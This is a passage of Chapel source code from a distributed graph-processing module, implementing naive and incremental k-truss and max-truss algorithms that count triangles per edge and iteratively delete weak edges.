//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( v1==v2) {
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
if SetCurF.getSize()>0 {
ConFlag=true;
}
SetCurF.clear();
// we try to remove as many edges as possible in the following code
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive Directed,Given K="+k:string+" All Removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Directed,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Directed,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Directed,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc NaiveKTrussDirected
//For directed graph, the straight forward method.
proc kTrussDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( v1==v2) {
EdgeDeleted[i]=k-1;
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
//var e3=findEdge(x,v);
var e3=findEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
}
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
if EReverse[i].size>0 {
forall (e1,e2) in EReverse[i] {
if ((EdgeDeleted[e1]==-1) && (EdgeDeleted[e2]==-1)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Directed,Given K="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Directed,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Directed,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Directed,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussDirected
// end of KTruss serial
//Begin of Max KTruss Serial
proc SkMaxTrussNaive(kInput:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):bool{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var k=kInput:int;
var ConFlag=true:bool;
var RemovedEdge=0: int;
//var TriCount=makeDistArray(Ne,int);
//TriCount=0;
var timer:Timer;
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
if ( du<=dv ) {
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
var e=findEdge(s,v);
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
} else {
var beginTmp=start_i[v];
var endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! vadj.isEmpty() ){
var Count=0:int;
forall s in vadj with ( + reduce Count) {
var e=findEdge(s,u);
if ( (e!=-1) && (e!=i) ) {
if ( lEdgeDeleted[e]==-1 ) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
lEdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
//if (!SetCurF.isEmpty()) {
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
if (lEdgeDeleted[i]==1-k) {
lEdgeDeleted[i] = k-1;
}
}
}// end of on loc
} // end of coforall loc in Locales
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SKMaxTrussNaive
//For undirected graph.
proc SkMaxTruss(kInput:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,
TriCount:[?D5] atomic int, lEdgeDeleted:[?D6] int ):bool{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var k=kInput:int;
var ConFlag=true:bool;
var RemovedEdge=0: int;
var timer:Timer;
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the truss version
timer.start();
{
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if lEdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (lEdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ( (lEdgeDeleted[e1]==-1) && (lEdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((lEdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (lEdgeDeleted[i]==1-k)) {//each local only check the owned edges
lEdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
if (lEdgeDeleted[j]==-1) {
if (TriCount[j].read()<k-2) {
lEdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
}// end of forall
} //end on loc
} //end coforall loc in Locales
tmpN2+=1;
//RemovedEdge+=SetCurF.getSize();
//SetCurF<=>SetNextF;
SetNextF.clear();
}// end of while (!SetCurF.isEmpty())
N2+=1;
}// end while
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
if (lEdgeDeleted[i]==1-k) {
lEdgeDeleted[i] = k-1;
}
}
}// end of on loc
} // end of coforall loc in Locales
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SkMaxTruss
//For undirected graph.
proc SkMaxTrussMix(kInput:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,
TriCount:[?D5] atomic int,lEdgeDeleted:[?D6] int):bool{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var k=kInput:int;
var ConFlag=true:bool;
var RemovedEdge=0: int;
var timer:Timer;
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
timer.start();
//we will try to remove all the unnecessary edges in the graph
